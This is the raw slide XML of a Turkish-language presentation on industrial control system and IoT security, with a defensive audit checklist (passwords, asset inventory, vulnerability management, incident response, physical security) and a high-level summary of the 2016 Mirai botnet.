                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>5. Cihaz Güvenliği (PLC/HMI/RTU)</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PLC'lerde varsayılan parolalar değiştirilmiş mi?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Gerekli olmayan servisler/devre dışı bırakılmış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Yetkisiz fiziksel erişim engellenmiş mi?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Konfigürasyon yedekleri güvenli şekilde saklanıyor mu?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>6. Varlık Envanteri ve İzleme</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Ağda hangi cihazın nerede olduğu, IP/MAC adresi, yazılım sürümü kayıtlı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Yeni cihazlar eklendiğinde loglanıyor ve kontrol ediliyor mu?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OT varlıkları için sürekli güncel envanter tutuluyor mu?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110950" y="37025"/>
            <a:ext cx="10126200" cy="5502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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>7. Zafiyet Yönetimi</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CVE bazlı güvenlik taramaları ICS ortamına uygun araçlarla yapılıyor mu?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Üçüncü parti bileşenlerin güvenlik açıkları takip ediliyor mu?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ICS spesifik zafiyet kaynakları (CISA ICS Advisories, MITRE ATT&amp;CK for ICS, CVSS-E for ICS) takip ediliyor mu?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 8. Test ve Simülasyon</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Yedekli test ortamı mevcut mu? (Gerçek sistemleri etkilemeden test yapabilmek için)</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Penetrasyon testleri, purple/red team tatbikatları yapılıyor mu?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GOOSE/Modbus replay/injection gibi OT'ye özgü saldırılar test edildi mi?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>9. Olay Müdahale ve Kayıt Yönetimi</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Olay müdahale planı ICS ortamı için özelleştirilmiş mi?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Loglar, merkezi bir yerde toplanıyor mu (SIEM, syslog sunucusu)?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Kritik olaylar için alarm tetikleyici yapılandırılmış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Olay sonrası analiz ve iyileştirme adımları belgeleniyor mu?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>10. Fiziksel Güvenlik</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="15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Kontrol odası ve sunucu odalarına giriş yetkileri sınırlı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Fiziksel erişim log’ları tutuluyor mu?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Kamera, alarm ve giriş kontrol sistemleri entegre mi?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379125" y="221975"/>
            <a:ext cx="10126200" cy="3661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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>11. Politika, Eğitim ve Farkındalık</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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OT personeli için siber güvenlik eğitimleri veriliyor mu?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Politika belgeleri (erişim, yedekleme, yama yönetimi vb.) tanımlanmış mı?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Tedarikçiler için güvenlik şartları ve SLA maddeleri mevcut mu?</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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>12. ICS Özel Raporlama Kaynakları</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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CISA ICS Alerts takip ediliyor mu?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MITRE ATT&amp;CK for ICS matrisi üzerinden tehdit modellemesi yapılıyor mu?</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Black Kite, Claroty, Dragos gibi özel analiz platformları kullanılıyor mu?</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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Checklistler:</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ICS sistemleri kurulum öncesi denetiminde,</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Penetrasyon testi sonrası durum değerlendirmesinde,</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Regülasyon uyumluluğu (NIST SP 800-82, IEC 62443) kontrolünde kullanılabilir.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p6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pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;487;p69" title="thank you.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-46225"/>
            <a:ext cx="9144000" cy="5189724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3638285" y="4487725"/>
            <a:ext cx="13695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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/ferdigul</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Google Shape;489;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056690" y="4405147"/>
            <a:ext cx="548745" cy="519057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1577592" y="4473175"/>
            <a:ext cx="12390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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/gulferdi</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="491" name="Google Shape;491;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215853" y="4473156"/>
            <a:ext cx="361754" cy="342182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Mail icon clipart" id="492" name="Google Shape;492;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135335" y="4473156"/>
            <a:ext cx="390474" cy="369348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5653350" y="4487725"/>
            <a:ext cx="25473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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0xfrd1gul@gmail.com </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226938" y="518750"/>
            <a:ext cx="962620" cy="888150"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1860000" w="2619375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2619375" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619375" y="1860000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1860000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Google Shape;495;p69" title="KOÜ Teknopark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23517" l="0" r="0" t="21980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2588164" y="588775"/>
            <a:ext cx="1404350" cy="748101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p69" title="Cyberus.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="824950" y="588776"/>
            <a:ext cx="1404339" cy="74809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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397625" y="475925"/>
            <a:ext cx="8450700" cy="4512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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Giriş: IoT Nedir? ve Neden Güvenlik Önemlidir?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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IoT (Internet of Things) tanımı ve örnekler (akıllı evler, endüstriyel IoT, sağlık cihazları, vs.)</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Artan cihaz sayısı = Artan saldırı yüzeyi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Gerçek dünyadan IoT zafiyet vakaları</a:t>
            </a:r>
            <a:endParaRPr b="0"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Örn: Mirai Botnet (2016), Jeep Cherokee Hack (2015)</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600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="6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Olayın Özeti (Mirai Botnet - IoT Güvenliği için Dönüm Noktası)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tarih</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: Eylül 2016</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Saldırının Türü</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: Dağıtık Hizmet Reddi (DDoS - Distributed Denial of Service)</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Araç</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: Mirai adlı zararlı yazılım (malware)</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hedefler</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: Dyn DNS hizmeti, Krebs on Security, OVH gibi büyük servis sağlayıcılar</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="6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Mirai Nasıl Çalışıyordu?</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600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mirai, internete bağlı IoT cihazlarını (örneğin:</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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Güvenlik kameraları,</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IP kameralar,</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ev yönlendiricileri (router),</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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>DVR cihazları)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="6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600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>gibi cihazları hedef alarak onları birer </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“zombi” cihaza</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> dönüştürdü ve </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ağına kattı.</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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
